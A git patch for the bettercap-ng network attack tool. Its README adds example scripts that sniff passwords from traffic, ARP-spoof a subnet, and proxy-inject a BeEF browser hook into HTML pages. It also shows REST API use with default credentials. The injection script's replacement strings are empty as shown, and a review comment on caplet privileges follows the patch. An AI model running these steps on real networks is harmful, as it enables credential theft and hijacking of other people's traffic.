From fe5f422aa6f6baaf62e446dd8a98ecf5dce6abcc Mon Sep 17 00:00:00 2001
From: evilsocket
Date: Mon, 8 Jan 2018 10:57:33 +0100
Subject: [PATCH] docs: readme update
---
 README.md | 112 +++++++++++++++++++++++++++++++++++++++++++++++-
 core/options.go | 2 +-
 2 files changed, 111 insertions(+), 3 deletions(-)
diff --git a/README.md b/README.md
index 2cbdc7eb..5af14bc1 100644
--- a/README.md
+++ b/README.md
@@ -24,9 +24,117 @@ Make sure you have a correctly configured Go >= 1.8 environment and the `libpcap To show the command line options: - sudo ./bettercap-ng -h + # sudo ./bettercap-ng -h + + Usage of ./bettercap-ng: + -caplet string + Read commands from this file and execute them in the interactive session. + -debug + Print debug messages. + -eval string + Run a command, used to set variables via command line. + -iface string + Network interface to bind to. + -no-history + Disable history file. + -silent + Suppress all logs which are not errors. -To have an idea of what commands you can use once `bettercap-ng` is started, take a look at the `caplets` scripts folder, each of those commands can be either manually entered during the interactive session, or scripted and loaded from `.cap` files. +## Caplets + +Interactive sessions can be scripted with `.cap` files, or `caplets`, the following are a few basic examples, look the `caplets` folder for more. + +#### caplets/simple-password-sniffer.cap + +Simple password sniffer. + +```sh +# keep reading arp table for network mapping +net.recon on +# setup a regular expression for packet payloads +set net.sniffer.regexp .*password=.+ +# set the sniffer output file +set net.sniffer.output passwords.pcap +# start the sniffer +net.sniffer on +``` + +#### caplets/rest-api.cap + +Start a rest API. + +```sh +# change these! 
+set api.rest.username bcap +set api.rest.password bcap +# set api.rest.port 8082 + +# actively probe network for new hosts +net.probe on +net.recon on + +# enjoy /api/session and /api/events +api.rest on +``` + +Get information about the current session: + + curl -k --user bpcap:bcap https://bettercap-ip:8083/api/session + +Execute a command in the current interactive session: + + curl -k --user bcap:bcap https://bettercap-ip:8083/api/session -H "Content-Type: application/json" -X POST -d '{"cmd":"net.probe on"}' + +Get last 50 events: + + curl -k --user bpcap:bcap https://bettercap-ip:8083/api/events?n=50 + +Clear events: + + curl -k --user bpcap:bcap -X DELETE https://bettercap-ip:8083/api/events + +#### caplets/beef-inject.cap + +Use a proxy script to inject a BEEF javascript hook: + +```sh +# targeting the whole subnet by default, to make it selective: +# +# sudo ./bettercap-ng -caplet caplets/beef-active.cap -eval "set arp.spoof.targets 192.168.1.64" + +# inject beef hook +set http.proxy.script caplets/beef-inject.js +# keep reading arp table for network mapping +net.recon on +# redirect http traffic to a proxy +http.proxy on +# wait for everything to start properly +sleep 1 +# make sure probing is off as it conflicts with arp spoofing +arp.spoof on +``` + +The `caplets/beef.inject.js` proxy script file: + +```javascript +function onLoad() { + console.log( "BeefInject loaded." ); + console.log("targets: " + env['arp.spoof.targets']); +} + +function onResponse(req, res) { + if( res.ContentType.indexOf('text/html') == 0 ){ + var body = res.ReadBody(); + if( body.indexOf('') != -1 ) { + res.Body = body.replace( + '', + '' + ); + res.Updated(); + } + } +} +``` ## License diff --git a/core/options.go b/core/options.go index bfbd7a40..d1bf3f0d 100644 --- a/core/options.go +++ b/core/options.go 
@@ -14,7 +14,7 @@ type Options struct {
 func ParseOptions() (Options, error) {
 o := Options{
 InterfaceName: flag.String("iface", "", "Network interface to bind to."),
- Caplet: flag.String("caplet", "", "Read commands from this file instead of goin into interactive mode."),
+ Caplet: flag.String("caplet", "", "Read commands from this file and execute them in the interactive session."),
 Debug: flag.Bool("debug", false, "Print debug messages."),
 Silent: flag.Bool("silent", false, "Suppress all logs which are not errors."),
 NoHistory: flag.Bool("no-history", false, "Disable history file."),
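Review bot: The reworded `-caplet` help text says the file's commands are executed in the session, but nothing in the visible part of ParseOptions tells a maintainer how much trust that file is given. The README in this same commit starts the binary with `sudo`, so a caplet's commands presumably run with root privileges. I would add a comment on the `Caplet:` line such as `// commands in this file run with the process's privileges; pass only a path you control`. The code that opens and parses the file is outside this hunk, so whether it checks the file's ownership or permissions cannot be confirmed from here. ParseOptions' body continues past the last line shown.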